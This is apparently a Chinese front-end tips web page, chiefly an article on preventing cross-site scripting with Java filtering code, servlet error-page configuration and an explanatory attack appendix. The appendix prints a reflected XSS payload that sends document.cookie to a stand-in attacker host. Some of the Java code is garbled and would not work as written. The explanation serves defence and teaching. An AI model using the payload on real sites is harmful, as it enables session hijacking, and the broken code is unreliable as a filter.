最新发布

# 2023-02-17
html怎么设置滚动图片？
方案一：直接使用HTML的滚动标签 marquee ，把图片放入滚滚标签内部，代码如下：&ltmarquee&gt&ltimg src='1.jpg'&gt&ltimg sr
# 2023-02-17
怎么让这个html超链接文字居中啊？
l让文字居中的方法：1、给文本所在标签加CSS属性值“text-align:center”；2、在行内标签或行内块级标签中加CSS属性值“text-align:left”。前端（vue）入门到精通课程：进入学习API 文档、设计、调试、自动
# 2023-02-17
记录：CSS3 模糊效果
最近在写活动页面遇到一个效果，在黑色透明蒙层后面的元素要有模糊，毛玻璃的效果，最初想到的就是 filter: blur(2px) ，直接在元素上使用，但是整个子元素都被模糊了，而且蒙层的背景并没有效果，经过百般搜索和尝试，发现还有一个属性
# 2023-02-17
怎么制作HTML网页，并通过邮箱发送?
1，使用桌面邮件程序如outlook，foxmail可以选择html模板，发送的邮件均会是html格式的。 2，使用gmail，126等邮箱其本生提供文本格式化，而格式化即使为文字添加代码只是这些代码你看不到而已，你所看到的是代码执行以后的
# 2023-02-17
css如何给图片加一个蒙版遮罩
1．首先，看一下HTML，一个img图像控件和一个带有样式的div，其中包含文本。这个就是蒙版遮罩层。2．然后，查看样式定义。先检查图像容器和图像样式，如图所示。其中要注意的是img_container样式里定义了position:rela
# 2023-02-17
css如何设置方形单选按
1、新建一个html文件，命名为test.html，用于讲解。2、在test.html文件中，使用button标签创建一个按钮。3、在test.html文件中，设置button标签的class属性为mybtn。4、在css标签内，通过cla
# 2023-02-17
css是什么意思
css指的是层叠样式表。css是一种用来表现HTML或XML等文件样式的计算机语言，是描述标记语言页面格式的标准。CSS使开发人员能够分离内容和可视元素，以实现更好的页面控制和灵活性。CSS不仅可以静态地修饰网页，还可以配合各种脚本语言动
# 2023-02-17
怎么让这个html超链接文字居中啊？
l让文字居中的方法：1、给文本所在标签加CSS属性值“text-align:center”；2、在行内标签或行内块级标签中加CSS属性值“text-align:left”。前端（vue）入门到精通课程：进入学习API 文档、设计、调试、自动
# 2023-02-17
css命名规范
把id留给后台开发和JS使用，除此之外页面的page id(如首页的外层需要一个ID id="pageIndex")，页面结构（header main footer）允许用id命名(ID命名建议使用驼峰命名)。其他禁止i
# 2023-02-17
如何用HTML来制作表格？
HTML中的表格由 &lttable&gt标签来定义，表格是由单元格组成的，单元格可以放入文字、图片、表格等内容。下面，我们来看看如何用HTML来制作表格吧。代码，先用&lttable&gt标签定义一个

如何防止跨站点脚本攻击

2023-03-03 14:36:01html-css017

如何防止跨站点脚本攻击,第1张

防止跨站点脚本攻击的解决方法：

1.输入过滤

对每一个用户的输入或者请求首部，都要进行过滤。这需要程序员有良好的安全素养，而且需要覆盖到所有的输入源。而且还不能够阻止其他的一些问题，如错误页等。

final String filterPattern="[<>{}\\[\\]\\&]"

String inputStr = s.replaceAll(filterPattern," ")

2.输出过滤

public static String encode(String data)

{

final StringBuffer buf = new StringBuffer()

final char[] chars = data.toCharArray()

for (int i = 0i <chars.lengthi++)

{

buf.append("" + (int) chars[i])

}

return buf.toString()

}

public static String decodeHex(final String data,

final String charEncoding)

{

if (data == null)

{

return null

}

byte[] inBytes = null

try

{

inBytes = data.getBytes(charEncoding)

}

catch (UnsupportedEncodingException e)

{

//use default charset

inBytes = data.getBytes()

}

byte[] outBytes = new byte[inBytes.length]

int b1

int b2

int j=0

for (int i = 0i <inBytes.lengthi++)

{

if (inBytes[i] == '%')

{

b1 = Character.digit((char) inBytes[++i], 16)

b2 = Character.digit((char) inBytes[++i], 16)

outBytes[j++] = (byte) (((b1 &0xf) <<4) +

(b2 &0xf))

}

else

{

outBytes[j++] = inBytes[i]

}

}

String encodedStr = null

try

{

encodedStr = new String(outBytes, 0, j, charEncoding)

}

catch (UnsupportedEncodingException e)

{

encodedStr = new String(outBytes, 0, j)

}

return encodedStr

}

<!-- Maps the 404 Not Found response code

to the error page /errPage404 -->

<error-page>

<error-code>404</error-code>

<location>/errPage404</location>

</error-page>

<!-- Maps any thrown ServletExceptions

to the error page /errPageServ -->

<error-page>

<exception-type>javax.servlet.ServletException</exception-type>

<location>/errPageServ</location>

</error-page>

<!-- Maps any other thrown exceptions

to a generic error page /errPageGeneric -->

<error-page>

<exception-type>java.lang.Throwable</exception-type>

<location>/errPageGeneric</location>

</error-page>

任何的非servlet例外都被/errPageGeneric路径捕捉，这样就可以处理。

Throwable throwable = (Throwable)

request.getAttribute("javax.servlet.error.exception")

String status_code = ((Integer)

request.getAttribute("javax.servlet.error.status_code")).toString( )

3.安装三方的应用防火墙，可以拦截css攻击。

附：

跨站脚本不像其他攻击只包含两个部分：攻击者和web站点。

跨站脚本包含三个部分：攻击者，客户和web站点。

跨站脚本攻击的目的是窃取客户的cookies，或者其他可以证明用户身份的敏感信息。

攻击

一个get请求

GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0

Host:

www.vulnerable.site

会产生如下的结果

<HTML>

<Title>Welcome!</Title>

Hi Joe Hacker

<BR>

Welcome to our system

...

</HTML>

但是如果请求被篡改

GET /welcome.cgi?name=<script>alert(document.cookie)</script>HTTP/1.0

Host: www.vulnerable.site

就会得到如下的响应

<HTML>

<Title>Welcome!</Title>

Hi <script>alert(document.cookie)</script>

<BR>

Welcome to our system

...

</HTML>

这样在客户端会有一段非法的脚本执行，这不具有破坏作用，但是如下的脚本就很危险了。

http://www.vulnerable.site/welcome.cgi?name=<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.cookie)</script>

响应如下：

<HTML>

<Title>Welcome!</Title>

Hi

<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”+document.cookie)</script>

<BR>

Welcome to our system

...

</HTML>

浏览器回执行该脚本并将客户的cookie发到一个攻击者的网站，这样攻击者就得到了客户的cookie。

传统防御技术传统XSS防御多采用特征匹配方式，在所有提交的信息中都进行匹配检查。对于这种类型的XSS攻击，采用的模式匹配方法一般会需要对“javascript”这个关键字进行检索，一旦发现提交信息中包含“javascript”，就认定为XSS攻击

词库加载错误未能找到文件“E高铁采集器内存溢出ConfigurationDictStopwordstxt”

# 上一篇：联想电脑按指纹后显示需要pin才能登录,怎么操作？

# 下一篇：适合玩游戏的电脑怎么检测电脑是否可以玩游戏